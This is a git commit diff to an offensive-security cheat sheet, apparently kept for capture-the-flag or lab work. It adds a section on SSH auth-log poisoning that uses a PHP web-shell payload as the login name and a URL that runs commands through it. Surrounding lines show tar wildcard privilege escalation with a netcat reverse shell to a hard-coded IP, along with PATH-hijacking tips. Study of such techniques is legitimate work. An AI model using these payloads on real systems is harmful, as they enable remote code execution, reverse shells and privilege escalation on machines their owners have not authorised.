Update Cheat Sheet.md

2024-11-10 06:34:17 +00:00 · 2021-01-09 02:05:33 +05:00 · 2021-01-09 02:05:33 +05:00 · 14ef176b57
commit 14ef176b57
parent ca2ecbef02
1 changed files with 9 additions and 0 deletions
--- a/Sheet.md
+++ b/Sheet.md
@ -118,6 +118,14 @@ $ kill %1
 ### SSH Port Forwarding
 `ssh -L <port_that_is_blockd_>:localhost:<map_blocked_port> <username>@<ip>`

+### SSH auth log poisoning
+
+Login as any user to see that it gets logged then try to login with a malicious php code
+
+`ssh '<?php system($_GET['a']); ?>'@192.168.43.2` 
+
+Then `http://ip/page?a=whoami;`
+
 ### Tar Exploitation

 When ever you see a cronjob running with a command `cd /<user>/andre/backup tar -zcf /<folder>/filetar.gz *` go to that folder from which a backup is being created and running these command in that directory <br/ >
@ -126,6 +134,7 @@ echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0</tmp/lhennp | /bin/sh >/tmp/lhen
 echo "" > "--checkpoint-action=exec=sh shell.sh"
 echo "" > --checkpoint=1
 ```
+
 ### Binary Exploits

 If there is a certain command running in a binary example `date` so we can create our own binary and add `/bin/bash` to and path so it gets executed<br/>